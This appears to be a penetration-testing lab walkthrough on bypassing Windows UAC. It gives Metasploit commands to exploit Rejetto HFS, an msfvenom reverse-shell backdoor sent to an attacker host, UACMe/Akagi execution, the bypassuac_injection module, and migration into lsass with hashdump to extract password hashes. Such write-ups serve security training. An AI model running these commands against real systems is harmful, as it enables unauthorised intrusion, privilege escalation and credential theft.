Bypassing UAC

User Account Control (UAC) is a Windows security feature introduced in Windows Vista to prevent unauthorized system changes. It ensures that any modification to the operating system requires approval from an administrator or a user with administrative privileges.

Non-privileged users executing programs with elevated privileges will receive a UAC credential prompt.
Privileged users will see a UAC consent prompt before the action is approved.

Bypassing

To bypass UAC, an attacker needs access to a local administrator account on the target system.

UAC prompts users before executing programs with administrative rights.
UAC operates at different integrity levels (Low to High). If set below High, certain programs can execute without user confirmation.
Various tools and techniques can be used to bypass UAC, depending on the Windows version.

UACMe

UACMe is an open-source and powerful privilege escalation tool. It automates UAC bypass techniques to execute processes with elevated privileges without triggering UAC prompts.

GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub

It provides a comprehensive and well-documented list of methods for bypassing UAC across multiple Windows versions, from Windows 7 to Windows 10. By exploiting the built-in Windows AutoElevate tool, it enables attackers to execute malicious payloads on a target system with administrative or elevated privileges.

## TARGET MACHINE

# Lists all user accounts on the system. This command helps identify available user accounts, including standard and administrator accounts.
net users

# Displays the members of the local Administrators group.
net localgroup administrators

## ATTACKER MACHINE

nmap [TARGET IP]

# w/ Metasploit
msfconsole
setg RHOSTS [TARGET IP]
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
exploit

## TARGET MACHINE using meterpreter

# target machine local enumeration
sysinfo
pgrep explorer / ps -S explorer.exe
migrate 2448
getsystem # elevation check
getuid
getprivs
shell
net user
net localgroup administrators

## ATTACKER MACHINE

# using UACMe
# Source > Akagi
# Default Settings required. Run executable from command line: 
akagi32 [Key] [Param] 
# or 
akagi64 [Key] [Param]
# First parameter is number of method to use, second is optional command (executable file name including full path) to run. Second parameter can be empty - in this case program will execute elevated cmd.exe from system32 folder.
# binary needs to be compiled

# meterpreter payload > upload that to the target > bypass UAC to execute this
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACKER IP] LPORT=[PORT] -f exe > backdoor.exe

# multi handler setup
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT [PORT]
exploit

## TARGET MACHINE using meterpreter

pwd
getuid
getprivs
cd C:\\
mkdir Temp
cd Temp
upload backdoor.exe
upload Akagi64.3xe
Akagi64.exe 23 backdoor.exe

# new meterpreter session with elevated privilege in the handler

I started by gathering basic information on the target machine, listing all user accounts (net users) and identifying members of the Administrators group (net localgroup administrators). Then, from the attacker machine, I scanned the target using Nmap to identify open ports and services.

I leveraged Metasploit to exploit the Rejetto HFS vulnerability, gaining an initial foothold on the target. Once inside, I used Meterpreter to enumerate system details (sysinfo), check running processes (pgrep explorer), migrate to a stable process, and verify privileges.

To escalate privileges, I utilized UACMe, an open-source privilege escalation tool, to bypass User Account Control (UAC). I created a Meterpreter payload using msfvenom, uploaded it to the target machine, and executed it with elevated privileges using UACMe (Akagi64.exe 23 backdoor.exe).

Finally, I set up a multi-handler on Metasploit to catch the reverse shell connection from the backdoor, successfully establishing a new Meterpreter session with elevated privileges on the target.

Memory Injection w/ Metasploit

use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

getsystem
getuid

ps -S lsass.exe
migrate 484

hashdump

I used the bypassuac_injection exploit to escalate privileges on a Windows machine. After setting the session and payload, I executed the exploit.

Once inside, I ran getsystem to gain SYSTEM privileges and confirmed my user identity with getuid.

Next, I listed processes searching for lsass.exe and migrated to its PID (484) for stability. Finally, I dumped password hashes using hashdump for credential extraction.

PreviousWindows Kernel Exploit NextAccess Token Impersonation

Last updated 9 months ago